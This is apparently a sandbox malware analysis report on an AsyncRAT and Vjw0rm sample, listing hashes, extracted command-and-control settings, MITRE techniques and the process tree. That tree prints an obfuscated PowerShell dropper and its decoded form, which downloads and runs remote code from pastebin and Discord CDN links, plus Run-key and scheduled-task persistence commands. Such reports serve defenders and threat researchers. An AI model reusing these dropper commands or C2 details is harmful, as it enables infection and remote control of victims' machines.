asyncrat | a77bf4f6f417a480f95547d6c6a332c42048d91e1768ff60afcc3ee54ff6e8c2

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
10-09-2024 01:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a.exe
Size

669KB
MD5

c28b393fccf6d23f9b175b44c4288893
SHA1

7d081db02f6654c785fca5b8187e13fdde5878c6
SHA256

08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a
SHA512

e9167c23388fe417a1da2733272a40052ca5db5f1068e57bfcf0864e129e7e9a5aab43d10647e6bdc2b84eb66f7ab0f1677e268f5581931b8a147cf74330fc3b
SSDEEP

12288:SBdlwHRn+WlYV+W2X+t4DwlFpJu0nTXoJwh7mA9St4xjXLYqEWXP+YjjPGoTI:SBkVdlYAW0MlFPnEJwB9SojIFkjPGR

Score

10^/10

asyncrat vjw0rm suepr envio sep03 discovery execution persistence rat trojan worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://pastebin.com/raw/V9y5Q5vv

Extracted

Family

asyncrat

Version

1.0.7

Botnet

SUEPR ENVIO SEP03

nyan43.duckdns.org:1963

Mutex

YHGBVFDC

Attributes

delay
15
install
false
install_file
qawsedrftyujgh.exe
install_folder
%AppData%

aes.plain

Extracted

Family

vjw0rm

http://yuya0415.duckdns.org:1928

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Vjw0rm
Vjw0rm is a remote access trojan written in JavaScript.
trojan worm vjw0rm

Blocklisted process makes network request 26 IoCs

Processes:

WScript.exepowershell.exe

flow	pid	process
14	812	WScript.exe
17	4836	powershell.exe
18	4836	powershell.exe
21	4836	powershell.exe
23	4836	powershell.exe
25	4836	powershell.exe
29	4836	powershell.exe
32	812	WScript.exe
39	812	WScript.exe
42	812	WScript.exe
56	812	WScript.exe
60	812	WScript.exe
62	812	WScript.exe
64	812	WScript.exe
67	812	WScript.exe
69	812	WScript.exe
70	812	WScript.exe
73	812	WScript.exe
79	812	WScript.exe
81	812	WScript.exe
83	812	WScript.exe
85	812	WScript.exe
87	812	WScript.exe
89	812	WScript.exe
91	812	WScript.exe
94	812	WScript.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a.exeDOCUMENTOS.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	DOCUMENTOS.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 3 IoCs

Processes:

DOCUMENTOS.exe.......exe.......exe

pid process

1240 DOCUMENTOS.exe
3036 .......exe
4788 .......exe

pid	process
1240	DOCUMENTOS.exe
3036	.......exe
4788	.......exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

WScript.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ZL320VW7T1 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\..............js\""	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\______DCNIYAN_____________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

2140 powershell.exe
4508 powershell.exe
4836 powershell.exe
4972 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

16 pastebin.com
18 pastebin.com
20 bitbucket.org
21 bitbucket.org
Suspicious use of SetThreadContext 1 IoCs

Processes:

.......exe

description pid process target process

PID 3036 set thread context of 4788 3036 .......exe .......exe
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
2140	powershell.exe
4508	powershell.exe
4836	powershell.exe
4972	powershell.exe

flow	ioc
16	pastebin.com
18	pastebin.com
20	bitbucket.org
21	bitbucket.org

description	pid	process	target process
PID 3036 set thread context of 4788	3036	.......exe	.......exe

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

WScript.exepowershell.exepowershell.exepowershell.execmd.exeWScript.exe.......exepowershell.exeDOCUMENTOS.exeschtasks.exe.......exe08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a.exeschtasks.exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	.......exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DOCUMENTOS.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	.......exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies registry class 1 IoCs

Processes:

DOCUMENTOS.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings DOCUMENTOS.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

3944 schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings	DOCUMENTOS.exe

pid	process
3944	schtasks.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4508	powershell.exe
4508	powershell.exe
4836	powershell.exe
4836	powershell.exe
4972	powershell.exe
4972	powershell.exe
4092	powershell.exe
4092	powershell.exe
4972	powershell.exe
4092	powershell.exe
4972	powershell.exe
2140	powershell.exe
2140	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

.......exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe.......exe

description	pid	process
Token: SeDebugPrivilege	3036	.......exe
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeDebugPrivilege	4836	powershell.exe
Token: SeDebugPrivilege	4972	powershell.exe
Token: SeDebugPrivilege	4092	powershell.exe
Token: SeDebugPrivilege	2140	powershell.exe
Token: SeDebugPrivilege	4788	.......exe
Token: SeDebugPrivilege	4788	.......exe

Suspicious use of WriteProcessMemory 44 IoCs

Processes:

08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a.execmd.exeDOCUMENTOS.exeWScript.exe.......exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4800 wrote to memory of 4768	4800	08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a.exe	cmd.exe
PID 4800 wrote to memory of 4768	4800	08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a.exe	cmd.exe
PID 4800 wrote to memory of 4768	4800	08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a.exe	cmd.exe
PID 4768 wrote to memory of 1240	4768	cmd.exe	DOCUMENTOS.exe
PID 4768 wrote to memory of 1240	4768	cmd.exe	DOCUMENTOS.exe
PID 4768 wrote to memory of 1240	4768	cmd.exe	DOCUMENTOS.exe
PID 1240 wrote to memory of 812	1240	DOCUMENTOS.exe	WScript.exe
PID 1240 wrote to memory of 812	1240	DOCUMENTOS.exe	WScript.exe
PID 1240 wrote to memory of 812	1240	DOCUMENTOS.exe	WScript.exe
PID 1240 wrote to memory of 3900	1240	DOCUMENTOS.exe	WScript.exe
PID 1240 wrote to memory of 3900	1240	DOCUMENTOS.exe	WScript.exe
PID 1240 wrote to memory of 3900	1240	DOCUMENTOS.exe	WScript.exe
PID 1240 wrote to memory of 3036	1240	DOCUMENTOS.exe	.......exe
PID 1240 wrote to memory of 3036	1240	DOCUMENTOS.exe	.......exe
PID 1240 wrote to memory of 3036	1240	DOCUMENTOS.exe	.......exe
PID 3900 wrote to memory of 2928	3900	WScript.exe	schtasks.exe
PID 3900 wrote to memory of 2928	3900	WScript.exe	schtasks.exe
PID 3900 wrote to memory of 2928	3900	WScript.exe	schtasks.exe
PID 3900 wrote to memory of 3944	3900	WScript.exe	schtasks.exe
PID 3900 wrote to memory of 3944	3900	WScript.exe	schtasks.exe
PID 3900 wrote to memory of 3944	3900	WScript.exe	schtasks.exe
PID 3900 wrote to memory of 4508	3900	WScript.exe	powershell.exe
PID 3900 wrote to memory of 4508	3900	WScript.exe	powershell.exe
PID 3900 wrote to memory of 4508	3900	WScript.exe	powershell.exe
PID 3036 wrote to memory of 4788	3036	.......exe	.......exe
PID 3036 wrote to memory of 4788	3036	.......exe	.......exe
PID 3036 wrote to memory of 4788	3036	.......exe	.......exe
PID 3036 wrote to memory of 4788	3036	.......exe	.......exe
PID 3036 wrote to memory of 4788	3036	.......exe	.......exe
PID 3036 wrote to memory of 4788	3036	.......exe	.......exe
PID 3036 wrote to memory of 4788	3036	.......exe	.......exe
PID 3036 wrote to memory of 4788	3036	.......exe	.......exe
PID 4508 wrote to memory of 4836	4508	powershell.exe	powershell.exe
PID 4508 wrote to memory of 4836	4508	powershell.exe	powershell.exe
PID 4508 wrote to memory of 4836	4508	powershell.exe	powershell.exe
PID 4836 wrote to memory of 4972	4836	powershell.exe	powershell.exe
PID 4836 wrote to memory of 4972	4836	powershell.exe	powershell.exe
PID 4836 wrote to memory of 4972	4836	powershell.exe	powershell.exe
PID 4836 wrote to memory of 4092	4836	powershell.exe	powershell.exe
PID 4836 wrote to memory of 4092	4836	powershell.exe	powershell.exe
PID 4836 wrote to memory of 4092	4836	powershell.exe	powershell.exe
PID 4972 wrote to memory of 2140	4972	powershell.exe	powershell.exe
PID 4972 wrote to memory of 2140	4972	powershell.exe	powershell.exe
PID 4972 wrote to memory of 2140	4972	powershell.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a.exe
"C:\Users\Admin\AppData\Local\Temp\08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DOCC..bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4768
- - C:\Users\Admin\AppData\Local\Temp\DOCUMENTOS.exe
    DOCUMENTOS.exe -pA2024 -dC:\Users\Admin\AppData\Local\Temp
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:1240
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\..............js"
      4⤵
      Blocklisted process makes network request
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:812
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\..........vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3900
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2928
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3944
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J☼Bq☼HY☼bgBl☼HU☼I☼☼9☼C☼☼Jw☼w☼DE☼Jw☼7☼CQ☼bwB6☼HM☼agBm☼C☼☼PQ☼g☼Cc☼JQBw☼Ho☼QQBj☼E8☼ZwBJ☼G4☼TQBy☼CU☼Jw☼7☼Fs☼UwB5☼HM☼d☼Bl☼G0☼LgBO☼GU☼d☼☼u☼FM☼ZQBy☼HY☼aQBj☼GU☼U☼Bv☼Gk☼bgB0☼E0☼YQBu☼GE☼ZwBl☼HI☼XQ☼6☼Do☼UwBl☼HI☼dgBl☼HI☼QwBl☼HI☼d☼Bp☼GY☼aQBj☼GE☼d☼Bl☼FY☼YQBs☼Gk☼Z☼Bh☼HQ☼aQBv☼G4☼QwBh☼Gw☼b☼Bi☼GE☼YwBr☼C☼☼PQ☼g☼Hs☼J☼B0☼HI☼dQBl☼H0☼OwBb☼FM☼eQBz☼HQ☼ZQBt☼C4☼TgBl☼HQ☼LgBT☼GU☼cgB2☼Gk☼YwBl☼F☼☼bwBp☼G4☼d☼BN☼GE☼bgBh☼Gc☼ZQBy☼F0☼Og☼6☼FM☼ZQBj☼HU☼cgBp☼HQ☼eQBQ☼HI☼bwB0☼G8☼YwBv☼Gw☼I☼☼9☼C☼☼WwBT☼Hk☼cwB0☼GU☼bQ☼u☼E4☼ZQB0☼C4☼UwBl☼GM☼dQBy☼Gk☼d☼B5☼F☼☼cgBv☼HQ☼bwBj☼G8☼b☼BU☼Hk☼c☼Bl☼F0☼Og☼6☼FQ☼b☼Bz☼DE☼Mg☼7☼Fs☼QgB5☼HQ☼ZQBb☼F0☼XQ☼g☼CQ☼dQBo☼G0☼eQB6☼C☼☼PQ☼g☼Fs☼cwB5☼HM☼d☼Bl☼G0☼LgBD☼G8☼bgB2☼GU☼cgB0☼F0☼Og☼6☼EY☼cgBv☼G0☼QgBh☼HM☼ZQ☼2☼DQ☼UwB0☼HI☼aQBu☼Gc☼K☼☼g☼Cg☼TgBl☼Hc☼LQBP☼GI☼agBl☼GM☼d☼☼g☼E4☼ZQB0☼C4☼VwBl☼GI☼QwBs☼Gk☼ZQBu☼HQ☼KQ☼u☼EQ☼bwB3☼G4☼b☼Bv☼GE☼Z☼BT☼HQ☼cgBp☼G4☼Zw☼o☼C☼☼K☼BO☼GU☼dw☼t☼E8☼YgBq☼GU☼YwB0☼C☼☼TgBl☼HQ☼LgBX☼GU☼YgBD☼Gw☼aQBl☼G4☼d☼☼p☼C4☼R☼Bv☼Hc☼bgBs☼G8☼YQBk☼FM☼d☼By☼Gk☼bgBn☼Cg☼JwBo☼HQ☼d☼Bw☼Do☼Lw☼v☼H☼☼YQBz☼HQ☼ZQBi☼Gk☼bg☼u☼GM☼bwBt☼C8☼cgBh☼Hc☼LwBW☼Dk☼eQ☼1☼FE☼NQB2☼HY☼Jw☼p☼C☼☼KQ☼g☼Ck☼OwBb☼HM☼eQBz☼HQ☼ZQBt☼C4☼QQBw☼H☼☼R☼Bv☼G0☼YQBp☼G4☼XQ☼6☼Do☼QwB1☼HI☼cgBl☼G4☼d☼BE☼G8☼bQBh☼Gk☼bg☼u☼Ew☼bwBh☼GQ☼K☼☼k☼HU☼a☼Bt☼Hk☼eg☼p☼C4☼RwBl☼HQ☼V☼B5☼H☼☼ZQ☼o☼Cc☼QwBs☼GE☼cwBz☼Ew☼aQBi☼HI☼YQBy☼Hk☼Mw☼u☼EM☼b☼Bh☼HM☼cw☼x☼Cc☼KQ☼u☼Ec☼ZQB0☼E0☼ZQB0☼Gg☼bwBk☼Cg☼JwBN☼HM☼cQBC☼Ek☼YgBZ☼Cc☼KQ☼u☼Ek☼bgB2☼G8☼awBl☼Cg☼J☼Bu☼HU☼b☼Bs☼Cw☼I☼Bb☼G8☼YgBq☼GU☼YwB0☼Fs☼XQBd☼C☼☼K☼☼n☼CY☼Nw☼5☼DU☼Nw☼3☼D☼☼NgBm☼Dg☼N☼Bm☼Dk☼M☼Bj☼Dk☼Nw☼2☼Dc☼NQ☼5☼DM☼O☼Bj☼GU☼MwBi☼GQ☼NgBj☼GE☼N☼Bj☼DY☼MwBi☼DE☼ZgBj☼DY☼Nw☼5☼DM☼Z☼Bj☼DM☼YQ☼1☼GE☼MgBi☼GI☼Mw☼x☼GM☼MwBi☼DQ☼Z☼Bh☼DY☼MQBk☼GM☼Zg☼9☼G0☼a☼☼m☼DU☼MQ☼y☼DQ☼NwBk☼DY☼Ng☼9☼HM☼aQ☼m☼DU☼OQ☼z☼Dk☼O☼Bk☼DY☼Ng☼9☼Hg☼ZQ☼/☼HQ☼e☼B0☼C4☼Mw☼0☼E4☼QQBZ☼Ek☼TgBD☼EQ☼Lw☼4☼Dg☼N☼☼1☼Dc☼MQ☼y☼Dg☼O☼☼z☼DU☼Ng☼0☼Dc☼NQ☼w☼Dg☼Mg☼x☼C8☼Mw☼1☼DE☼MQ☼z☼DE☼NQ☼4☼DE☼Mg☼3☼DY☼MQ☼5☼DE☼M☼☼4☼DI☼MQ☼v☼HM☼d☼Bu☼GU☼bQBo☼GM☼YQB0☼HQ☼YQ☼v☼G0☼bwBj☼C4☼c☼Bw☼GE☼Z☼By☼G8☼YwBz☼Gk☼Z☼☼u☼G4☼Z☼Bj☼C8☼Lw☼6☼HM☼c☼B0☼HQ☼a☼☼n☼C☼☼L☼☼g☼CQ☼bwB6☼HM☼agBm☼C☼☼L☼☼g☼Cc☼XwBf☼F8☼XwBf☼F8☼R☼BD☼E4☼SQBZ☼EE☼TgBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼C0☼LQ☼t☼C0☼LQ☼t☼C0☼Jw☼s☼C☼☼J☼Bq☼HY☼bgBl☼HU☼L☼☼g☼Cc☼MQ☼n☼Cw☼I☼☼n☼FI☼bwBk☼GE☼Jw☼g☼Ck☼KQ☼7☼☼==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $MkplqW.replace('☼','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\..........vbs');powershell -command $KByHL;
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4508
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$jvneu = '01';$ozsjf = 'C:\Users\Admin\AppData\Local\Temp\..........vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $uhmyz = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($uhmyz).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&7957706f84f90c97675938ce3bd6ca4c63b1fc6793dc3a5a2bb31c3b4da61dcf=mh&51247d66=si&59398d66=xe?txt.34NAYINCD/8845712883564750821/3511315812761910821/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $ozsjf , '______DCNIYAN_____________________________________-------', $jvneu, '1', 'Roda' ));"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4972
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        8⤵
        Adds Run key to start application
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\..........vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4092
  - - C:\Users\Admin\AppData\Local\Temp\.......exe
      "C:\Users\Admin\AppData\Local\Temp\.......exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3036
    - - C:\Users\Admin\AppData\Local\Temp\.......exe
        
        "C:\Users\Admin\AppData\Local\Temp\.......exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4788

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
47ad785a164d8ff087b5fc8372b82520

SHA1
f23b4ab647065004331d06eb701783f4c89a74dd

SHA256
03c404532d410575bc3c3aeb45e8c3f0156801f985eb66111aee0672e682155a

SHA512
c6e9e7d2b8148432dc274966915c6a0c801a44f1b40fa17fa88a185243087606986befe3f19ba16953aa6d6d7e57788a6a265c105d01deae7bd154313f4985a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
791be96732d0fc4f9bebda99af0fb88c

SHA1
e2c6ac1605154483996763ab4fbc10fff5e6030e

SHA256
e39822b07556f25638e971d2b586fa47aaeec1219e1d1e22b2c458a9ba7e95a8

SHA512
12889dc11a20d1d99b0e53d78f4f0978b5db5f8b241eb0c79b72502e42d4210722a2a7461e3b11d3953fc0ab2381c013608c3024ad49a462be24944e6e8ba9f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
fd1e72c190ffbf43a90b8f40765d492a

SHA1
bc06bbdf88c2c41e56c144c35d707041ed23c596

SHA256
30be0707c846571124b891fa050ef9c79daba83ef30470f92923f9b0a81192ee

SHA512
ffb9159c341b026ce2b8960b91206aecd6c00a4ce76498a98398e806d6653e33aa26f441d38402f05a67dcefeb1f5d7e8f19a7781c1b3bf37983dcf6175ce408

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
dfb8c00bfa8659a295efb5f278af422e

SHA1
f9a938c153d3df60a5f2a343513d009a1a5aed7f

SHA256
a64ffed74f351c40db8c0b4e7bfc103e29eea9ee734fb09279fd41ce18c61c96

SHA512
1d0d8b6a3638b90022a4a850f6076c7ba18b8736384019821c3924044cc035a206c69194bcfae4a67ef9601510db651691035229a97883a3cd3621a099b1a5ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\..............js

Filesize
19KB

MD5
1e2d967510acc2d7eafe89a5e7065d22

SHA1
a4a48ef24001200fbe87192a235a1e1b93503ed9

SHA256
d65a679961d19a6b4019bf4b236358376512776779c6ef553afb1a82066ae5b5

SHA512
729d0d2216c30d7ad3dd6ee9e0853a7e61baab23f5013aa93c7c64707718eef3353c97de3dc32133a03389ffb5c42334620644520ff90ccaa7a7e1639414955d

Download Submit
C:\Users\Admin\AppData\Local\Temp\..........vbs

Filesize
11.1MB

MD5
52f3268631d8e587ca16d620fa730ca4

SHA1
9d2fd3dfc0b55a052d9b9f38e12f353e266b5283

SHA256
89e19321c824beee9a59f3099287709c97ff2741601d87575ecae823b72330fe

SHA512
cb2c2c871d17c4d86137ce986754fa99beabf7844b601abd6dcd95e8cd44cec5c9233699aa84d1ea05473de593295f6fb6256446e85e9dde7e140b0942138e99

Download Submit
C:\Users\Admin\AppData\Local\Temp\.......exe

Filesize
168KB

MD5
f1519c55864faaee2b9c5d1fe108c161

SHA1
6c52b209f54224c968c3c97697760a41687b6d94

SHA256
0061e8f7d0c9996657cf12c53bd07b3c803b209fc20dbfb085c96f6a3e34fa80

SHA512
36994b04e89b39590a5ed699bc8a66ae28db20f4fffbdf1c2e9a3123660d8d10711ef4b7cc0d3b4d80e871a3b83372a4a88b2a1546f51d835af9cf5084859cac

Download Submit
C:\Users\Admin\AppData\Local\Temp\DOCC..bat

Filesize
31B

MD5
dbc43c69d0db1281d4980239473e6878

SHA1
1e1c00319ec2d094d7b4b7f20a06fe33ef3f3505

SHA256
f6139a5b45f9d856e978740acb52bd00e38dd963006293f05b7f279f61dce123

SHA512
a814be51d049b6080a69fd3c178143cc4624d3eccb8c415813d177d377975c907383c3a08c98b815211f9af50ecf246875072ad548ebfa63341dd6a68d4925a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\DOCUMENTOS.exe

Filesize
496KB

MD5
92bc72b4a0421640775050aebb624629

SHA1
cbe83c0360e84f816e70c9a63ef82e6437b0a97b

SHA256
d33377b73ab3ab2b13508d9e4c293cc45b63bb2cb94297d39822f71e66a20d36

SHA512
3c1d6e9b0a81b288b04d614a3997236a7a5af538015cb7caa159daa409f35cccfb149a9adfd9314856e43a7f0f3237a43d16177299ff2f7d8b5c34e7659a5064

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m1j3laeo.5z4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx1.ps1

Filesize
286B

MD5
8a14359cd71dbdea46036319d2b68a56

SHA1
f4ee6bd57835c2039462eee3035702da4a36d794

SHA256
9924b64a99a84a6d31d8d8733ca565ceffc6adebdc3f77912f429eeaadfef1c7

SHA512
